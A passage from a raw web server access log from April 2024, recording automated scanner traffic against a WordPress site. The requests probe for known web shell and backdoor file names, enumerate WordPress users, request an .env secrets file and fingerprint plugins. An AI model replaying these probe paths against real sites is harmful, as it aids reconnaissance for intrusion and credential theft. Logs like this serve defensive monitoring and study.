Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:29 +0700] "GET /mail.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:39 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:48 +0700] "GET /doc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:55 +0700] "GET /bak.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:21:04 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:21:12 +0700] "GET /upfile.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:21:21 +0700] "GET /wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:21:28 +0700] "GET /wp-conflg.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:21:37 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:21:54 +0700] "GET /wp-activate.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:05 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:09 +0700] "GET /updates.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:12 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:15 +0700] "GET /plugins.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:18 +0700] "GET /xmrlpc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:23 +0700] "GET /ae.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:26 +0700] "GET /moon.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:35 +0700] "GET /blog.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:43 +0700] "GET /themes.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:50 +0700] "GET /ini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:22:57 +0700] "GET /as.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:23:06 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:23:13 +0700] "GET /ws.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:23:22 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:23:31 +0700] "GET /makeasmtp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:23:40 +0700] "GET /wp-sigunq.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:23:47 +0700] "GET /wso112233.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:01 +0700] "GET /wp-atom.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:06 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:12 +0700] "GET /fw.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:22 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:25 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:31 +0700] "GET /mini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:38 +0700] "GET /configs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:43 +0700] "GET /test.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:24:56 +0700] "GET /classsmtps.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:25:04 +0700] "GET /wp-hudbud.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:25:12 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:25:21 +0700] "GET /autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:25:32 +0700] "GET /text.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 198.235.24.101 - - [10/Apr/2024:19:55:08 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 34.222.199.92 - - [11/Apr/2024:11:29:43 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 143.244.148.99 - - [12/Apr/2024:14:12:21 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 54.88.179.33 - - [13/Apr/2024:03:51:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 198.235.24.156 - - [13/Apr/2024:05:43:53 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 80.251.219.111 - - [13/Apr/2024:10:26:25 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 80.251.219.111 - - [13/Apr/2024:10:26:31 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 80.251.219.111 - - [13/Apr/2024:10:26:36 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 195.154.184.173 - - [14/Apr/2024:06:07:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 18.246.20.46 - - [15/Apr/2024:01:56:24 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 47.107.176.36 - - [17/Apr/2024:08:04:04 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 47.107.176.36 - - [17/Apr/2024:08:04:17 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 47.107.176.36 - - [17/Apr/2024:08:04:26 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [17/Apr/2024:09:50:27 +0700] "GET /wp-aa.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 54.88.179.33 - - [18/Apr/2024:15:13:42 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 194.56.216.2 - - [18/Apr/2024:23:08:17 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 194.56.216.2 - - [18/Apr/2024:23:08:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 194.56.216.2 - - [18/Apr/2024:23:08:41 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [19/Apr/2024:09:08:19 +0700] "GET /about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [19/Apr/2024:09:08:35 +0700] "GET /wp-includes/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [19/Apr/2024:09:08:51 +0700] "GET /wp-admin/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [19/Apr/2024:09:09:05 +0700] "GET /wp-admin/admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [19/Apr/2024:09:09:20 +0700] "GET /wp-content/admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [19/Apr/2024:09:09:36 +0700] "GET /wp-content/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [19/Apr/2024:09:09:53 +0700] "GET /admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 83.147.52.42 - - [19/Apr/2024:10:26:26 +0700] "GET /api/.env HTTP/1.1" 301 162 "-" "Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)" 205.210.31.27 - - [20/Apr/2024:18:34:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.129.37.184 - - [22/Apr/2024:05:21:50 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.129.37.184 - - [22/Apr/2024:05:21:57 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.129.37.184 - - [22/Apr/2024:05:22:04 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 35.94.147.39 - - [22/Apr/2024:11:16:54 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15" 54.244.61.109 - - [22/Apr/2024:15:52:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.143 Safari/537.36" 104.248.141.116 - - [23/Apr/2024:01:16:52 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 104.248.141.116 - - [23/Apr/2024:01:16:58 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 104.248.141.116 - - [23/Apr/2024:01:17:02 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 87.236.176.52 - - [23/Apr/2024:09:25:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 205.210.31.224 - - [23/Apr/2024:22:41:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.33 - - [24/Apr/2024:15:13:28 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 91.92.252.169 - - [25/Apr/2024:04:52:51 +0700] "GET /about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Apr/2024:04:53:15 +0700] "GET /wp-includes/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Apr/2024:04:53:31 +0700] "GET /wp-admin/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Apr/2024:04:53:53 +0700] "GET /wp-admin/admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Apr/2024:04:54:12 +0700] "GET /wp-content/admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Apr/2024:04:54:32 +0700] "GET /wp-content/about.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Apr/2024:04:54:49 +0700] "GET /admin.php?520 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.205.17.174 - - [25/Apr/2024:13:28:33 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.205.17.174 - - [25/Apr/2024:13:28:38 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.205.17.174 - - [25/Apr/2024:13:28:43 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 35.171.144.152 - - [25/Apr/2024:16:13:50 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 165.227.107.128 - - [26/Apr/2024:10:06:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 152.32.164.18 - - [26/Apr/2024:13:33:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 152.32.164.18 - - [26/Apr/2024:13:34:12 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 152.32.164.18 - - [26/Apr/2024:13:34:16 +0700] "GET /sitemap.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 152.32.164.18 - - [26/Apr/2024:13:34:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 152.32.164.18 - - [26/Apr/2024:13:34:36 +0700] "GET /wp-content/plugins/date-time-picker-for-contact-form-7/readme.txt HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 152.32.164.18 - - [26/Apr/2024:13:34:37 +0700] "GET /wp-content/plugins/sassy-social-share/readme.txt HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 152.32.164.18 - - [26/Apr/2024:13:34:38 +0700] "GET /wp-content/plugins/post-views-counter/readme.txt HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 152.32.164.18 - - [26/Apr/2024:13:34:40 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 152.32.164.18 - - [26/Apr/2024:13:34:40 +0700] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 152.32.164.18 - - [26/Apr/2024:13:34:41 +0700] "GET /wp-content/plugins/click-to-chat-for-whatsapp/readme.txt HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 152.32.164.18 - - [26/Apr/2024:13:34:42 +0700] "GET /wp-content/themes/matina-news/readme.txt HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 92.118.39.244 - - [26/Apr/2024:19:24:01 +0700] "GET / HTTP/1.1" 301 162 "-" "BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103" 199.45.154.31 - - [27/Apr/2024:14:50:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 205.210.31.163 - - [28/Apr/2024:03:26:40 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 198.235.24.15 - - [28/Apr/2024:04:48:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [30/Apr/2024:00:31:00 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [30/Apr/2024:00:31:04 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [30/Apr/2024:00:31:09 +0700] "GET /inc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [30/Apr/2024:00:31:16 +0700] "GET /lv.php 